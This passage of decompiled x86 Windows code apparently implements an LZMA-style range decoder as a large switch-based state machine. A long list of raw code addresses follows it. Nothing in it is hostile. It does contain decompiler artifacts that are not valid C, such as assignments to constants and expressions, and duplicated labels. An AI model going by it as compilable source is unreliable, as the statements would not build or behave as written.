												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x84) = 0xa;
													__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
												} else {
													__eax =  *(__ebp - 0x38);
													__ecx =  *(__ebp - 4);
													__eax =  *(__ebp - 0x38) + 0xf;
													 *(__ebp - 0x84) = 9;
													 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
													__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
												}
												while(1) {
													L132:
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											case 9:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													goto L89;
												}
												__eflags =  *(__ebp - 0x60);
												if( *(__ebp - 0x60) == 0) {
													goto L171;
												}
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												_t259 =  *(__ebp - 0x38) - 7 >= 0;
												__eflags = _t259;
												0 | _t259 = _t259 + _t259 + 9;
												 *(__ebp - 0x38) = _t259 + _t259 + 9;
												goto L76;
											case 0xa:
												goto L0;
											case 0xb:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__ecx =  *(__ebp - 0x24);
													__eax =  *(__ebp - 0x20);
													 *(__ebp - 0x20) =  *(__ebp - 0x24);
												} else {
													__eax =  *(__ebp - 0x24);
												}
												__ecx =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												goto L88;
											case 0xc:
												L99:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xc;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t334 = __ebp - 0x70;
												 *_t334 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t334;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												__eax =  *(__ebp - 0x2c);
												goto L101;
											case 0xd:
												L37:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xd;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t122 = __ebp - 0x70;
												 *_t122 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t122;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L39:
												__eax =  *(__ebp - 0x40);
												__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
												if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
													goto L48;
												}
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													goto L54;
												}
												L41:
												__eax =  *(__ebp - 0x5b) & 0x000000ff;
												 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
												__ecx =  *(__ebp - 0x58);
												__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
												 *(__ebp - 0x48) = __eax;
												__eax = __eax + 1;
												__eax = __eax << 8;
												__eax = __eax + __ebx;
												__esi =  *(__ebp - 0x58) + __eax * 2;
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edx = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													 *(__ebp - 0x40) = 1;
													__cx = __ax >> 5;
													__eflags = __eax;
													__ebx = __ebx + __ebx + 1;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edx;
													0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L39;
												} else {
													goto L37;
												}
											case 0xe:
												L46:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xe;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t156 = __ebp - 0x70;
												 *_t156 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t156;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												while(1) {
													L48:
													__eflags = __ebx - 0x100;
													if(__ebx >= 0x100) {
														break;
													}
													__eax =  *(__ebp - 0x58);
													__edx = __ebx + __ebx;
													__ecx =  *(__ebp - 0x10);
													__esi = __edx + __eax;
													__ecx =  *(__ebp - 0x10) >> 0xb;
													__ax =  *__esi;
													 *(__ebp - 0x54) = __esi;
													__edi = __ax & 0x0000ffff;
													__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
													__eflags =  *(__ebp - 0xc) - __ecx;
													if( *(__ebp - 0xc) >= __ecx) {
														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
														__cx = __ax;
														_t170 = __edx + 1; // 0x1
														__ebx = _t170;
														__cx = __ax >> 5;
														__eflags = __eax;
														 *__esi = __ax;
													} else {
														 *(__ebp - 0x10) = __ecx;
														0x800 = 0x800 - __edi;
														0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
														__ebx = __ebx + __ebx;
														 *__esi = __cx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													 *(__ebp - 0x44) = __ebx;
													if( *(__ebp - 0x10) >= 0x1000000) {
														continue;
													} else {
														goto L46;
													}
												}
												L54:
												_t173 = __ebp - 0x34;
												 *_t173 =  *(__ebp - 0x34) & 0x00000000;
												__eflags =  *_t173;
												goto L55;
											case 0xf:
												L58:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xf;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t203 = __ebp - 0x70;
												 *_t203 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t203;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L60:
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													L55:
													__al =  *(__ebp - 0x44);
													 *(__ebp - 0x5c) =  *(__ebp - 0x44);
													goto L56;
												}
												L61:
												__eax =  *(__ebp - 0x58);
												__edx = __ebx + __ebx;
												__ecx =  *(__ebp - 0x10);
												__esi = __edx + __eax;
												__ecx =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													_t217 = __edx + 1; // 0x1
													__ebx = _t217;
													__cx = __ax >> 5;
													__eflags = __eax;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L60;
												} else {
													goto L58;
												}
											case 0x10:
												L109:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0x10;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t365 = __ebp - 0x70;
												 *_t365 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t365;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												goto L111;
											case 0x11:
												goto L69;
											case 0x12:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 0x58);
													 *(__ebp - 0x84) = 0x13;
													__esi =  *(__ebp - 0x58) + 2;
													while(1) {
														L132:
														 *(_t613 - 0x54) = _t606;
														goto L133;
													}
												}
												__eax =  *(__ebp - 0x4c);
												 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
												__ecx =  *(__ebp - 0x58);
												__eax =  *(__ebp - 0x4c) << 4;
												__eflags = __eax;
												__eax =  *(__ebp - 0x58) + __eax + 4;
												goto L130;
											case 0x13:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													_t469 = __ebp - 0x58;
													 *_t469 =  *(__ebp - 0x58) + 0x204;
													__eflags =  *_t469;
													 *(__ebp - 0x30) = 0x10;
													 *(__ebp - 0x40) = 8;
													L144:
													 *(__ebp - 0x7c) = 0x14;
													goto L145;
												}
												__eax =  *(__ebp - 0x4c);
												__ecx =  *(__ebp - 0x58);
												__eax =  *(__ebp - 0x4c) << 4;
												 *(__ebp - 0x30) = 8;
												__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
												L130:
												 *(__ebp - 0x58) = __eax;
												 *(__ebp - 0x40) = 3;
												goto L144;
											case 0x14:
												 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
												__eax =  *(__ebp - 0x80);
												 *(_t613 - 0x88) = _t533;
												goto L1;
											case 0x15:
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xb;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
												goto L120;
											case 0x16:
												__eax =  *(__ebp - 0x30);
												__eflags = __eax - 4;
												if(__eax >= 4) {
													_push(3);
													_pop(__eax);
												}
												__ecx =  *(__ebp - 4);
												 *(__ebp - 0x40) = 6;
												__eax = __eax << 7;
												 *(__ebp - 0x7c) = 0x19;
												 *(__ebp - 0x58) = __eax;
												goto L145;
											case 0x17:
												L145:
												__eax =  *(__ebp - 0x40);
												 *(__ebp - 0x50) = 1;
												 *(__ebp - 0x48) =  *(__ebp - 0x40);
												goto L149;
											case 0x18:
												L146:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0x18;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t484 = __ebp - 0x70;
												 *_t484 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t484;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L148:
												_t487 = __ebp - 0x48;
												 *_t487 =  *(__ebp - 0x48) - 1;
												__eflags =  *_t487;
												L149:
												__eflags =  *(__ebp - 0x48);
												if( *(__ebp - 0x48) <= 0) {
													__ecx =  *(__ebp - 0x40);
													__ebx =  *(__ebp - 0x50);
													0 = 1;
													__eax = 1 << __cl;
													__ebx =  *(__ebp - 0x50) - (1 << __cl);
													__eax =  *(__ebp - 0x7c);
													 *(__ebp - 0x44) = __ebx;
													while(1) {
														 *(_t613 - 0x88) = _t533;
														goto L1;
													}
												}
												__eax =  *(__ebp - 0x50);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
												__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
												__eax =  *(__ebp - 0x58);
												__esi = __edx + __eax;
												 *(__ebp - 0x54) = __esi;
												__ax =  *__esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													__cx = __ax >> 5;
													__eax = __eax - __ecx;
													__edx = __edx + 1;
													__eflags = __edx;
													 *__esi = __ax;
													 *(__ebp - 0x50) = __edx;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L148;
												} else {
													goto L146;
												}
											case 0x19:
												__eflags = __ebx - 4;
												if(__ebx < 4) {
													 *(__ebp - 0x2c) = __ebx;
													L119:
													_t393 = __ebp - 0x2c;
													 *_t393 =  *(__ebp - 0x2c) + 1;
													__eflags =  *_t393;
													L120:
													__eax =  *(__ebp - 0x2c);
													__eflags = __eax;
													if(__eax == 0) {
														 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
														goto L170;
													}
													__eflags = __eax -  *(__ebp - 0x60);
													if(__eax >  *(__ebp - 0x60)) {
														goto L171;
													}
													 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
													__eax =  *(__ebp - 0x30);
													_t400 = __ebp - 0x60;
													 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
													__eflags =  *_t400;
													goto L123;
												}
												__ecx = __ebx;
												__eax = __ebx;
												__ecx = __ebx >> 1;
												__eax = __ebx & 0x00000001;
												__ecx = (__ebx >> 1) - 1;
												__al = __al | 0x00000002;
												__eax = (__ebx & 0x00000001) << __cl;
												__eflags = __ebx - 0xe;
												 *(__ebp - 0x2c) = __eax;
												if(__ebx >= 0xe) {
													__ebx = 0;
													 *(__ebp - 0x48) = __ecx;
													L102:
													__eflags =  *(__ebp - 0x48);
													if( *(__ebp - 0x48) <= 0) {
														__eax = __eax + __ebx;
														 *(__ebp - 0x40) = 4;
														 *(__ebp - 0x2c) = __eax;
														__eax =  *(__ebp - 4);
														__eax =  *(__ebp - 4) + 0x644;
														__eflags = __eax;
														L108:
														__ebx = 0;
														 *(__ebp - 0x58) = __eax;
														 *(__ebp - 0x50) = 1;
														 *(__ebp - 0x44) = 0;
														 *(__ebp - 0x48) = 0;
														L112:
														__eax =  *(__ebp - 0x40);
														__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
														if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
															_t391 = __ebp - 0x2c;
															 *_t391 =  *(__ebp - 0x2c) + __ebx;
															__eflags =  *_t391;
															goto L119;
														}
														__eax =  *(__ebp - 0x50);
														 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
														__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
														__eax =  *(__ebp - 0x58);
														__esi = __edi + __eax;
														 *(__ebp - 0x54) = __esi;
														__ax =  *__esi;
														__ecx = __ax & 0x0000ffff;
														__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
														__eflags =  *(__ebp - 0xc) - __edx;
														if( *(__ebp - 0xc) >= __edx) {
															__ecx = 0;
															 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
															__ecx = 1;
															 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
															__ebx = 1;
															__ecx =  *(__ebp - 0x48);
															__ebx = 1 << __cl;
															__ecx = 1 << __cl;
															__ebx =  *(__ebp - 0x44);
															__ebx =  *(__ebp - 0x44) | __ecx;
															__cx = __ax;
															__cx = __ax >> 5;
															__eax = __eax - __ecx;
															__edi = __edi + 1;
															__eflags = __edi;
															 *(__ebp - 0x44) = __ebx;
															 *__esi = __ax;
															 *(__ebp - 0x50) = __edi;
														} else {
															 *(__ebp - 0x10) = __edx;
															0x800 = 0x800 - __ecx;
															0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
															 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
															 *__esi = __dx;
														}
														__eflags =  *(__ebp - 0x10) - 0x1000000;
														if( *(__ebp - 0x10) >= 0x1000000) {
															L111:
															_t368 = __ebp - 0x48;
															 *_t368 =  *(__ebp - 0x48) + 1;
															__eflags =  *_t368;
															goto L112;
														} else {
															goto L109;
														}
													}
													__ecx =  *(__ebp - 0xc);
													__ebx = __ebx + __ebx;
													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
													__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
													 *(__ebp - 0x44) = __ebx;
													if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
														__ecx =  *(__ebp - 0x10);
														 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
														__ebx = __ebx | 0x00000001;
														__eflags = __ebx;
														 *(__ebp - 0x44) = __ebx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													if( *(__ebp - 0x10) >= 0x1000000) {
														L101:
														_t338 = __ebp - 0x48;
														 *_t338 =  *(__ebp - 0x48) - 1;
														__eflags =  *_t338;
														goto L102;
													} else {
														goto L99;
													}
												}
												__edx =  *(__ebp - 4);
												__eax = __eax - __ebx;
												 *(__ebp - 0x40) = __ecx;
												__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
												goto L108;
											case 0x1a:
												L56:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													 *(__ebp - 0x88) = 0x1a;
													goto L170;
												}
												__ecx =  *(__ebp - 0x68);
												__al =  *(__ebp - 0x5c);
												__edx =  *(__ebp - 8);
												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
												 *( *(__ebp - 0x68)) = __al;
												__ecx =  *(__ebp - 0x14);
												 *(__ecx +  *(__ebp - 8)) = __al;
												__eax = __ecx + 1;
												__edx = 0;
												_t192 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t192;
												goto L80;
											case 0x1b:
												L76:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													 *(__ebp - 0x88) = 0x1b;
													goto L170;
												}
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__edx =  *(__ebp - 8);
												__cl =  *(__eax + __edx);
												__eax =  *(__ebp - 0x14);
												 *(__ebp - 0x5c) = __cl;
												 *(__eax + __edx) = __cl;
												__eax = __eax + 1;
												__edx = 0;
												_t275 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t275;
												__eax =  *(__ebp - 0x68);
												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												_t284 = __ebp - 0x64;
												 *_t284 =  *(__ebp - 0x64) - 1;
												__eflags =  *_t284;
												 *( *(__ebp - 0x68)) = __cl;
												L80:
												 *(__ebp - 0x14) = __edx;
												goto L81;
											case 0x1c:
												while(1) {
													L123:
													__eflags =  *(__ebp - 0x64);
													if( *(__ebp - 0x64) == 0) {
														break;
													}
													__eax =  *(__ebp - 0x14);
													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
													__eflags = __eax -  *(__ebp - 0x74);
													if(__eax >=  *(__ebp - 0x74)) {
														__eax = __eax +  *(__ebp - 0x74);
														__eflags = __eax;
													}
													__edx =  *(__ebp - 8);
													__cl =  *(__eax + __edx);
													__eax =  *(__ebp - 0x14);
													 *(__ebp - 0x5c) = __cl;
													 *(__eax + __edx) = __cl;
													__eax = __eax + 1;
													__edx = 0;
													_t414 = __eax %  *(__ebp - 0x74);
													__eax = __eax /  *(__ebp - 0x74);
													__edx = _t414;
													__eax =  *(__ebp - 0x68);
													 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
													 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
													 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
													__eflags =  *(__ebp - 0x30);
													 *( *(__ebp - 0x68)) = __cl;
													 *(__ebp - 0x14) = _t414;
													if( *(__ebp - 0x30) > 0) {
														continue;
													} else {
														L81:
														 *(__ebp - 0x88) = 2;
														goto L1;
													}
												}
												 *(__ebp - 0x88) = 0x1c;
												goto L170;
										}
									}
									L171:
									_t535 = _t534 | 0xffffffff;
									goto L172;
								}
							}
						}
					}
					goto L1;
				}
			}













                                                                                    0x00000000
                                                                                    0x004064ee
                                                                                    0x004064ee
                                                                                    0x004064f2
                                                                                    0x004064ff
                                                                                    0x00406509
                                                                                    0x00000000
                                                                                    0x004064f4
                                                                                    0x004064f4
                                                                                    0x0040652f
                                                                                    0x00406532
                                                                                    0x00406535
                                                                                    0x00406538
                                                                                    0x00406538
                                                                                    0x0040653b
                                                                                    0x00406542
                                                                                    0x00406547
                                                                                    0x00406428
                                                                                    0x0040642b
                                                                                    0x0040679d
                                                                                    0x0040679d
                                                                                    0x0040679d
                                                                                    0x004067a0
                                                                                    0x004067a0
                                                                                    0x004067a0
                                                                                    0x004067a6
                                                                                    0x004067ac
                                                                                    0x004067b2
                                                                                    0x004067cc
                                                                                    0x004067cf
                                                                                    0x004067d5
                                                                                    0x004067e0
                                                                                    0x004067e2
                                                                                    0x004067b4
                                                                                    0x004067b4
                                                                                    0x004067c3
                                                                                    0x004067c7
                                                                                    0x004067c7
                                                                                    0x004067ec
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x004067ee
                                                                                    0x004067f2
                                                                                    0x004069a1
                                                                                    0x004069b7
                                                                                    0x004069bf
                                                                                    0x004069c6
                                                                                    0x004069c8
                                                                                    0x004069cf
                                                                                    0x004069d3
                                                                                    0x004069d3
                                                                                    0x004067fe
                                                                                    0x00406805
                                                                                    0x0040680d
                                                                                    0x00406810
                                                                                    0x00406813
                                                                                    0x00406813
                                                                                    0x00406819
                                                                                    0x00406819
                                                                                    0x00405fb5
                                                                                    0x00405fb5
                                                                                    0x00405fb5
                                                                                    0x00405fbe
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00405fc4
                                                                                    0x00000000
                                                                                    0x00405fcf
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00405fd8
                                                                                    0x00405fdb
                                                                                    0x00405fde
                                                                                    0x00405fe2
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00405fe8
                                                                                    0x00405feb
                                                                                    0x00405fed
                                                                                    0x00405fee
                                                                                    0x00405ff1
                                                                                    0x00405ff3
                                                                                    0x00405ff4
                                                                                    0x00405ff6
                                                                                    0x00405ff9
                                                                                    0x00405ffe
                                                                                    0x00406003
                                                                                    0x0040600c
                                                                                    0x0040601f
                                                                                    0x00406022
                                                                                    0x0040602e
                                                                                    0x00406056
                                                                                    0x00406058
                                                                                    0x00406066
                                                                                    0x00406066
                                                                                    0x0040606a
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x0040605a
                                                                                    0x0040605a
                                                                                    0x0040605d
                                                                                    0x0040605e
                                                                                    0x0040605e
                                                                                    0x00000000
                                                                                    0x0040605a
                                                                                    0x00406034
                                                                                    0x00406039
                                                                                    0x00406039
                                                                                    0x00406042
                                                                                    0x0040604a
                                                                                    0x0040604d
                                                                                    0x00000000
                                                                                    0x00406053
                                                                                    0x00406053
                                                                                    0x00000000
                                                                                    0x00406053
                                                                                    0x00000000
                                                                                    0x00406070
                                                                                    0x00406070
                                                                                    0x00406074
                                                                                    0x00406920
                                                                                    0x00000000
                                                                                    0x00406920
                                                                                    0x0040607d
                                                                                    0x0040608d
                                                                                    0x00406090
                                                                                    0x00406093
                                                                                    0x00406093
                                                                                    0x00406093
                                                                                    0x00406096
                                                                                    0x0040609a
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x0040609c
                                                                                    0x004060a2
                                                                                    0x004060cc
                                                                                    0x004060d2
                                                                                    0x004060d9
                                                                                    0x00000000
                                                                                    0x004060d9
                                                                                    0x004060a8
                                                                                    0x004060ab
                                                                                    0x004060b0
                                                                                    0x004060b0
                                                                                    0x004060bb
                                                                                    0x004060c3
                                                                                    0x004060c6
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x0040610b
                                                                                    0x00406111
                                                                                    0x00406114
                                                                                    0x00406121
                                                                                    0x00406129
                                                                                    0x0040679d
                                                                                    0x0040679d
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x004060e0
                                                                                    0x004060e0
                                                                                    0x004060e4
                                                                                    0x0040692f
                                                                                    0x00000000
                                                                                    0x0040692f
                                                                                    0x004060f0
                                                                                    0x004060fb
                                                                                    0x004060fb
                                                                                    0x004060fb
                                                                                    0x004060fe
                                                                                    0x00406101
                                                                                    0x00406104
                                                                                    0x00406109
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x004067a0
                                                                                    0x004067a0
                                                                                    0x004067a6
                                                                                    0x004067ac
                                                                                    0x004067b2
                                                                                    0x004067cc
                                                                                    0x004067cf
                                                                                    0x004067d5
                                                                                    0x004067e0
                                                                                    0x004067e2
                                                                                    0x004067b4
                                                                                    0x004067b4
                                                                                    0x004067c3
                                                                                    0x004067c7
                                                                                    0x004067c7
                                                                                    0x004067ec
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00406131
                                                                                    0x00406133
                                                                                    0x00406136
                                                                                    0x004061a7
                                                                                    0x004061aa
                                                                                    0x004061ad
                                                                                    0x004061b4
                                                                                    0x004061be
                                                                                    0x0040679d
                                                                                    0x0040679d
                                                                                    0x0040679d
                                                                                    0x00000000
                                                                                    0x0040679d
                                                                                    0x0040679d
                                                                                    0x00406138
                                                                                    0x0040613c
                                                                                    0x0040613f
                                                                                    0x00406141
                                                                                    0x00406144
                                                                                    0x00406147
                                                                                    0x00406149
                                                                                    0x0040614c
                                                                                    0x0040614e
                                                                                    0x00406153
                                                                                    0x00406156
                                                                                    0x00406159
                                                                                    0x0040615d
                                                                                    0x00406164
                                                                                    0x00406167
                                                                                    0x0040616e
                                                                                    0x00406172
                                                                                    0x0040617a
                                                                                    0x0040617a
                                                                                    0x0040617a
                                                                                    0x00406174
                                                                                    0x00406174
                                                                                    0x00406174
                                                                                    0x00406169
                                                                                    0x00406169
                                                                                    0x00406169
                                                                                    0x0040617e
                                                                                    0x00406181
                                                                                    0x0040619f
                                                                                    0x004061a1
                                                                                    0x00000000
                                                                                    0x00406183
                                                                                    0x00406183
                                                                                    0x00406186
                                                                                    0x00406189
